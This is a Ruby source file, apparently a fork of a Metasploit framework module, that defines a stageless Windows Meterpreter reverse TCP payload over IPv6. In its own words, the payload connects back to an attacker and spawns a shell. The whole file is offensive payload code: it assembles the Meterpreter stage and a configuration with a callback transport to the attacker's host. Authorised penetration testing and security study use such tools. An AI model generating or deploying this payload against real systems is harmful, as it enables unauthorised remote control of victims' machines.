/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb

https://github.com/asnild/meta · Ruby · 71 lines · 50 code · 14 blank · 7 comment · 3 complexity · 0dff3c82ebebd4317db22d8b0f0a13c1 MD5 · raw file 

    

  1. ##
    2. 

  2. # This module requires Metasploit: http://metasploit.com/download
    3. 

  3. # Current source: https://github.com/rapid7/metasploit-framework
    4. 

  4. ##
    5. 

  5. 

  6. require 'msf/core'
    7. 

  7. require 'msf/core/payload/transport_config'
    8. 

  8. require 'msf/core/handler/reverse_tcp'
    9. 

  9. require 'msf/core/payload/windows/meterpreter_loader'
    10. 

  10. require 'msf/base/sessions/meterpreter_x86_win'
    11. 

  11. require 'msf/base/sessions/meterpreter_options'
    12. 

  12. require 'rex/payloads/meterpreter/config'
    13. 

  13. 

  14. module MetasploitModule
    15. 

  15. 

  16.   CachedSize = 957487
    17. 

  17. 

  18.   include Msf::Payload::TransportConfig
    19. 

  19.   include Msf::Payload::Windows
    20. 

  20.   include Msf::Payload::Single
    21. 

  21.   include Msf::Payload::Windows::MeterpreterLoader
    22. 

  22.   include Msf::Sessions::MeterpreterOptions
    23. 

  23. 

  24.   def initialize(info = {})
    25. 

  25. 

  26.     super(merge_info(info,
    27. 

  27.       'Name'        => 'Windows Meterpreter Shell, Reverse TCP Inline (IPv6)',
    28. 

  28.       'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
    29. 

  29.       'Author'      => [ 'OJ Reeves' ],
    30. 

  30.       'License'     => MSF_LICENSE,
    31. 

  31.       'Platform'    => 'win',
    32. 

  32.       'Arch'        => ARCH_X86,
    33. 

  33.       'Handler'     => Msf::Handler::ReverseTcp,
    34. 

  34.       'Session'     => Msf::Sessions::Meterpreter_x86_Win
    35. 

  35.       ))
    36. 

  36. 

  37.     register_options([
    38. 

  38.       OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
    39. 

  39.       OptString.new('EXTINIT',    [false, 'Initialization strings for extensions']),
    40. 

  40.       OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0])
    41. 

  41.     ], self.class)
    42. 

  42.   end
    43. 

  43. 

  44.   def generate(opts={})
    45. 

  45.     opts[:stageless] = true
    46. 

  46.     stage_meterpreter(opts) + generate_config(opts)
    47. 

  47.   end
    48. 

  48. 

  49.   def generate_config(opts={})
    50. 

  50.     opts[:uuid] ||= generate_payload_uuid
    51. 

  51. 

  52.     # create the configuration block
    53. 

  53.     config_opts = {
    54. 

  54.       arch:       opts[:uuid].arch,
    55. 

  55.       exitfunk:   datastore['EXITFUNC'],
    56. 

  56.       expiration: datastore['SessionExpirationTimeout'].to_i,
    57. 

  57.       uuid:       opts[:uuid],
    58. 

  58.       transports: [transport_config_reverse_ipv6_tcp(opts)],
    59. 

  59.       extensions: (datastore['EXTENSIONS'] || '').split(','),
    60. 

  60.       ext_init:   (datastore['EXTINIT'] || '')
    61. 

  61.     }
    62. 

  62. 

  63.     # create the configuration instance based off the parameters
    64. 

  64.     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
    65. 

  65. 

  66.     # return the binary version of it
    67. 

  67.     config.to_b
    68. 

  68.   end
    69. 

  69. 

  70. end
    71.